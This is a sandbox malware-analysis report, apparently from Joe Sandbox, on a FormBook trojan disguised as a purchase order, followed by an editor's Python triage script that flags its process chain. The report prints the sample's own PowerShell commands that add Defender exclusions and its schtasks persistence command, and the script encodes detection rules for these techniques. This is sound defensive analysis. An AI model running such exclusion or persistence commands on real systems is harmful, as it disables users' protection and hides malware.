            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0370591017_2_03705910
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036DD80017_2_036DD800
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036738E017_2_036738E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FF0917_2_0372FF09
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FFB117_2_0372FFB1
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03671F9217_2_03671F92
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03679EB017_2_03679EB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03727D7317_2_03727D73
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03673D4017_2_03673D40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03721D5A17_2_03721D5A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0368FDC017_2_0368FDC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036E9C3217_2_036E9C32
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FCF217_2_0372FCF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF1C4017_2_00CF1C40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CECB8017_2_00CECB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CECB7817_2_00CECB78
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CECDA017_2_00CECDA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CEAE2017_2_00CEAE20
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF52D017_2_00CF52D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF34C017_2_00CF34C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF34BB17_2_00CF34BB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D0B8D017_2_00D0B8D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0348E56317_2_0348E563
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0348E44817_2_0348E448
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0348D96817_2_0348D968
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0348E8FC17_2_0348E8FC
            Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 0365B970 appears 280 times
            Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 036DEA12 appears 86 times
            Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 036B7E54 appears 111 times
            Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 036A5130 appears 58 times
            Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 036EF290 appears 105 times
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Code function: String function: 0182EA12 appears 37 times
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Code function: String function: 01807E54 appears 97 times
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 01815130 appears 58 times
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 0184EA12 appears 86 times
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 0185F290 appears 105 times
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 017CB970 appears 280 times
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 01827E54 appears 111 times
            Source: New Purchase Order.exe, 00000000.00000002.2165111682.0000000002E71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.2169659316.0000000007390000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000000.2117156904.0000000000A34000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamevBdq.exe> vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.2165884062.0000000003F69000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.2160258865.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSETUPUGC.EXEj% vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000009.00000002.2391524148.000000000138B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSETUPUGC.EXEj% vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000009.00000002.2391856999.00000000018CD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New Purchase Order.exe
            Source: New Purchase Order.exe | Binary or memory string: OriginalFilenamevBdq.exe> vs New Purchase Order.exe
            Source: New Purchase Order.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: New Purchase Order.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: hbaiQWstL.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, SRCqlIJcgwJZFuosxj.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, SRCqlIJcgwJZFuosxj.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, SRCqlIJcgwJZFuosxj.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/16@8/6
            Source: C:\Users\user\Desktop\New Purchase Order.exe | File created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Mutant created: \Sessions\1\BaseNamedObjects\sxREZFUdzxCrbaDpfWuO
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_03
            Source: C:\Users\user\Desktop\New Purchase Order.exe | File created: C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp
            Source: New Purchase Order.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\New Purchase Order.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: setupugc.exe, 00000011.00000003.2580907005.0000000003221000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3376763818.0000000003216000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3376763818.0000000003244000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2574961436.0000000003216000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: New Purchase Order.exe | Virustotal: Detection: 32%
            Source: New Purchase Order.exe | ReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\New Purchase Order.exe | File read: C:\Users\user\Desktop\New Purchase Order.exe
            Source: unknown | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe C:\Users\user\AppData\Roaming\hbaiQWstL.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Process created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | Process created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
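The process-creation rows above carry the whole infection chain in a few lines: the dropper adds Defender exclusions for itself and for the dropped hbaiQWstL.exe through Add-MpPreference, registers the Updates\hbaiQWstL task from an XML file in %TEMP%, relaunches its own image (the second instance is where the FormBook payload is unpacked), and the injected setupugc.exe instance, itself spawned from a randomly named folder under Program Files (x86), starts Firefox. The script below is an added example by the editor, not code from the Joe Sandbox report or from the sample: it parses those rows (copied from the report above, whitespace normalised; the parser also accepts the column-fused form the text extraction produced) into parent/child records and counts the detection rules each one trips. The rule names, the LOLBIN and browser lists and the C:\Windows\ prefix test are the editor's assumptions, not part of the report; it uses only the Python standard library.

```python
"""Triage of the 'Process created' rows in the sandbox report above.

Added example by the editor: not part of the Joe Sandbox report and not code
from the analysed sample. REPORT_ROWS is copied from the report (whitespace
normalised); rule names and the LOLBIN/browser lists are the editor's choices.
"""
import ntpath
import re
from collections import Counter

REPORT_ROWS = [
    r'Source: unknown | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"',
    r'Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"',
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"',
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"',
    r'Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"',
    r'Source: unknown | Process created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe C:\Users\user\AppData\Roaming\hbaiQWstL.exe',
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding',
    r'Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp"',
    r'Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Process created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"',
    r'Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | Process created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"',
    r'Source: C:\Windows\SysWOW64\setupugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"',
]

# Accepts "Source: X | Process created: Y" as well as the column-fused form the
# text extraction produces ("Source: XProcess created: Y ... Jump to behavior").
# The child image is taken as everything up to the first ".exe" followed by
# whitespace, which copes with image paths that contain spaces.
ROW_RE = re.compile(
    r"^Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*"
    r"(?P<image>.+?\.exe)\s+(?P<cmdline>.*?)(?:\s*Jump to behavior)?$",
    re.IGNORECASE,
)

# Editor's assumptions: system tools a legitimate installer might also spawn,
# browsers whose credential stores FormBook targets, and the Windows directory.
LOLBINS = {"powershell.exe", "schtasks.exe", "conhost.exe", "cmd.exe", "wmiprvse.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
WINDIR = "C:\\Windows\\"


def parse_rows(rows):
    """Turn report rows into dicts with parent, image and cmdline keys."""
    records = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        records.append({k: v.strip() for k, v in m.groupdict().items()})
    return records


def _base(path):
    return ntpath.basename(path).lower()


def _under(path, prefix):
    return ntpath.normcase(path).startswith(ntpath.normcase(prefix))


def flag(rec):
    """Names of the rules a single parent/child record trips."""
    parent, image, cmd = rec["parent"], rec["image"], rec["cmdline"]
    low = cmd.lower()
    known_parent = parent.lower() != "unknown"
    hits = []
    if _base(image) == "powershell.exe" and "add-mppreference" in low and "-exclusionpath" in low:
        hits.append("defender_exclusion")          # AV exclusion added for the payload
    if _base(image) == "schtasks.exe" and "/create" in low and re.search(r'/xml\s+"?[^"]*\\temp\\', cmd, re.I):
        hits.append("schtask_from_temp_xml")       # persistence via task XML staged in %TEMP%
    if known_parent and ntpath.normcase(parent) == ntpath.normcase(image):
        hits.append("self_respawn")                # same image relaunched: hollowing candidate
    if known_parent and _under(image, WINDIR) and not _under(parent, WINDIR) and _base(image) not in LOLBINS:
        hits.append("system_binary_from_userland_parent")  # e.g. setupugc.exe from Program Files (x86)\<random>
    if _base(image) in BROWSERS and _under(parent, WINDIR):
        hits.append("browser_spawned_by_system_binary")    # injected host starting a browser
    return hits


def triage(rows):
    """Aggregate rule hits and the IOCs worth pulling out of the chain."""
    summary = {"rules": Counter(), "excluded_paths": [], "task_names": [], "chain": []}
    for rec in parse_rows(rows):
        hits = flag(rec)
        summary["rules"].update(hits)
        if "defender_exclusion" in hits:
            summary["excluded_paths"].append(re.search(r'-ExclusionPath\s+"([^"]+)"', rec["cmdline"], re.I).group(1))
        if "schtask_from_temp_xml" in hits:
            summary["task_names"].append(re.search(r'/TN\s+"([^"]+)"', rec["cmdline"], re.I).group(1))
        summary["chain"].append((_base(rec["parent"]), _base(rec["image"]), hits))
    return summary


if __name__ == "__main__":
    result = triage(REPORT_ROWS)
    for parent, child, hits in result["chain"]:
        print(f"{parent:>28} -> {child:<28} {', '.join(hits) or '-'}")
    print("rule counts:", dict(result["rules"]))
    print("Defender exclusions:", result["excluded_paths"])
    print("scheduled tasks:", sorted(set(result["task_names"])))
```

Run against the rows above, the script reports two Defender exclusions, two task registrations from %TEMP%, two self-respawns, one Windows binary started from a userland parent (setupugc.exe) and one browser launched by a Windows binary (Firefox from setupugc.exe). The conhost.exe and WmiPrvSE.exe rows trip nothing, which is the point of the LOLBIN and parent-directory tests: a rule keyed on "PowerShell spawned by an executable" alone would fire on every installer, whereas the Add-MpPreference argument, the /XML path under Temp and the parent directory are what separate this chain from benign activity.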
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
